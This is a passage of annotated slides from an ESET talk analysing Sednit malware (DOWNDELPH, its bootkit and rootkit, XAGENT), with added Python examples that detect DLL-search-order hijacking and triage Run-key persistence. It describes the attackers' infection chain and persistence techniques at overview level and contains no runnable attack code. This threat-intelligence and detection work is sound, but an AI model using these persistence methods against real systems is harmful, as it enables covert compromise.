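pattern described above, where a copy of a system DLL (msi.dll, LINKINFO.dll)
is planted in an application folder so it loads before the one in system32.
The directory layout, DLL list and file contents are constructed for the demo."""
import hashlib
import tempfile
from pathlib import Path

# DLL names that live in system32 and that an application folder should not
# carry its own copy of (constructed short list; build it from a real inventory).
SYSTEM_DLLS = {"msi.dll", "linkinfo.dll", "version.dll", "cryptsp.dll"}


def _sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_shadowing_dlls(app_dirs, system_dir, system_dlls=SYSTEM_DLLS):
    """Scan app_dirs for files named like a system DLL.

    Returns a sorted list of (path, verdict). A same-named file whose hash
    matches the copy in system_dir is only a duplicate; one that differs, or
    has no system copy at all, is the hijacking pattern and is marked SUSPICIOUS.
    """
    findings = []
    for app_dir in app_dirs:
        root = Path(app_dir)
        if not root.is_dir():
            continue
        for entry in root.iterdir():
            if not entry.is_file() or entry.name.lower() not in system_dlls:
                continue
            legit = Path(system_dir) / entry.name
            if legit.is_file() and _sha256(legit) == _sha256(entry):
                verdict = "identical copy of system DLL"
            else:
                verdict = "SUSPICIOUS: shadows system DLL with different content"
            findings.append((str(entry), verdict))
    return sorted(findings)


def build_demo_tree():
    """Constructed stand-in for C:\\Windows\\system32, the Office folder and
    C:\\WINDOWS, mirroring the two cases in the talk plus one benign duplicate.
    Returns (app_dirs, system_dir)."""
    base = Path(tempfile.mkdtemp(prefix="hijack_demo_"))
    system32, office, windows = base / "system32", base / "Office", base / "WINDOWS"
    for d in (system32, office, windows):
        d.mkdir()
    (system32 / "msi.dll").write_bytes(b"legit msi.dll")
    (system32 / "LINKINFO.dll").write_bytes(b"legit LINKINFO.dll")
    (system32 / "cryptsp.dll").write_bytes(b"legit cryptsp.dll")
    (office / "WINWORD.EXE").write_bytes(b"word")
    (office / "cryptsp.dll").write_bytes(b"legit cryptsp.dll")  # benign duplicate
    (office / "msi.dll").write_bytes(b"planted loader, forwards exports")  # msi.dll case
    (windows / "LINKINFO.dll").write_bytes(b"planted loader")  # LINKINFO.dll case
    return [str(office), str(windows)], str(system32)


if __name__ == "__main__":
    app_dirs, system_dir = build_demo_tree()
    for path, verdict in find_shadowing_dlls(app_dirs, system_dir):
        print(f"{verdict}: {path}")
```

On a real host the same function would be pointed at the Office installation folder, C:\WINDOWS and other directories on the loader's search path, with `system_dir` set to the real system32; the hash comparison is what keeps legitimate redistributed copies of a DLL from drowning out the planted ones.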
166. Chain of Events (timeline, Mon to Fri)
• 9:30AM: Serge opens an email leading to SEDKIT, and then SEDUPLOADER
• 10:00AM: SEDRECO deployment
• 02:00PM: XAGENT deployment
• 11:00AM: Long-term persistence method deployment
• Then: information exfiltration and lateral movements
170. The Ultimate Boring Component
• Delphi downloader, we named it DOWNDELPH (slow clap)
• Simple workflow:
– Downloads a config (.INI file)
– Based on the config, downloads a payload
– Executes payload
• Persistence method: Run registry key
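Run-key persistence is the most mundane item in that list, and also the cheapest to audit: every autostart value names a program, and a program launched from a user profile or a temp directory deserves a look. The triage routine below is added here as an example and not code from the ESET talk; it parses a constructed `reg export` style dump of the HKCU and HKLM Run keys, and the entries, paths and trusted-directory list are all constructed or assumed for the demo.

```python
"""Added example (not from the ESET talk): triage of Run-key persistence, the
method listed for DOWNDELPH. It parses a constructed 'reg export' style dump of
the HKCU/HKLM Run keys and flags values whose program lives outside the trusted
program directories. Entries, paths and the trusted list are constructed/assumed."""
import re

# Directories a legitimate autostart program is expected to live under
# (assumption for the demo; compare against the local software baseline).
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

# Constructed Run-key dump in .reg syntax: backslashes doubled, quotes escaped.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"updater"="C:\\Users\\serge\\AppData\\Roaming\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Adobe Reader"="C:\\Program Files (x86)\\Adobe\\Reader\\Reader_sl.exe"
"srvc"="\"C:\\ProgramData\\tmp\\dwnl.exe\" -q"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
EXE_RE = re.compile(r'^"?(.*?\.exe)', re.IGNORECASE)


def _unescape(s):
    # Undo .reg escaping: a backslash followed by any character stands for that character.
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_keys(text):
    """Yield (key, value_name, command) for every value under a ...\\Run key."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key and key.lower().endswith("\\run"):
            yield key, _unescape(m.group(1)), _unescape(m.group(2))


def program_path(command):
    """Extract the executable from a Run value (quoted or bare path, optional args)."""
    m = EXE_RE.match(command)
    return m.group(1) if m else command


def untrusted_run_entries(text, trusted=TRUSTED_PREFIXES):
    """Return [(value_name, program_path)] for autostart entries outside trusted dirs."""
    findings = []
    for _key, name, command in parse_run_keys(text):
        path = program_path(command)
        if not path.lower().startswith(trusted):
            findings.append((name, path))
    return findings


if __name__ == "__main__":
    for name, path in untrusted_run_entries(SAMPLE_REG):
        print(f"Run value {name!r} starts {path} from an untrusted location")
```

The location check is deliberately coarse: its job is to shrink a Run-key listing to the handful of entries worth hashing and checking for a valid signature, not to pass a verdict on its own.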
172. Let The Hunt Begin
2013 DOWNDELPH Sample (diagram components): Dropper, Helper, Bootkit Installer, DOWNDELPH
• Infects BIOS-based systems
• Tested on Windows XP/7, 32bit/64bit
• Never been documented
195. Bootkit Workflow (diagram)
Boot chain: Infected MBR → BOOTMGR → Winload.exe → ACPI.sys → Bootkit Driver → “Bootkit user-mode component” → DOWNDELPH
(Real Mode, then Protected Mode; Original MBR; Kernel Init; three Hook points)
Why a DLL to load another DLL?
196. Who Are You Bootkit?
• Missing exported variable in DOWNDELPH
• Code sharing with BlackEnergy
– Relocations fixing
– DLL injection calling three exports (“Entry”, “ep_data” and “Dummy”)
– …
198. But It’s Not The End of The Story
2014 DOWNDELPH Samples (diagram components): Dropper, Helper, Kernel Mode Rootkit, DOWNDELPH
206. Who Are You Rootkit?
• Never documented (to the best of our knowledge)
• PDB paths:
d:!worketchiBinDebugwin7x86fsflt.pdb
d:!worketchideinstaller_kis2013BinDebugwin7x64fsflt.pdb
d:newhideinstallerBinDebugwxpx86fsflt.pdb
209. To Summarize
• Seven different samples (!) of DOWNDELPH over the past three years
• One C&C server was up for two years
• Persistence methods:
– Bootkit able to infect from Windows XP to Windows 7
– Rootkit
• So, WHY such advanced persistence methods for such a simple component?
• DOWNDELPH downloaded SEDRECO + XAGENT in a few cases, so SEDNIT related for sure
211. Call For Speculation
• The diversity of Sednit software is impressive (DOWNDELPH, bootkit, XAGENT, SEDKIT…)
• Diversity is good for their operations, as it makes detection and tracking harder
• How did they create this software ecosystem?
212. Sednit Development Process (1)
Developers Role
• Binaries are often compiled specifically for a target, after it has been infected
(figure: XAGENT SMTP logins/passwords)
• Main software evolves regularly (XTUNNEL, SEDUPLOADER, XAGENT…)
Developers are part of the team, not outsiders paid for a one-time job
215. Sednit Development Process (2)
Software Design
• Different Sednit software share some techniques:
– RC4 keys built as concatenation of a hardcoded value and a randomly generated value (XAGENT, DOWNDELPH, SEDUPLOADER)
– Hardcoded “tokens” in network messages (XAGENT, SEDUPLOADER, SEDRECO)
The same developers may be behind this variety of software
222. Sednit Development Process (3)
Programming Errors
(figure: XTUNNEL report message)
Developers do not have a code review process (“hackish” feeling)
223. Sednit Development Process (4)
Seeking Inspiration
• SEDUPLOADER employed novel persistence methods also found in crimeware, and shares code with Carberp
• DOWNDELPH bootkit code bears some similarities with BlackEnergy code
Developers have ties with the crimeware underground
227. Mumblings Summary
Sednit has some in-house skilled developers, working with little supervision, and those guys have ties with crimeware underground
228. Conclusion
• Sednit activity increased a lot during the last two years (targeted attacks with a LOT of targets)
– Heard about the DNC hack last week?
• Sednit toolkit in constant evolution, moar fun to come!
229. That’s All Folks!
• Feel free to poke us: {calvet,campos,dupuy} .at. esetlabs.com
• Whitepaper coming soon!... (“dans deux mois”)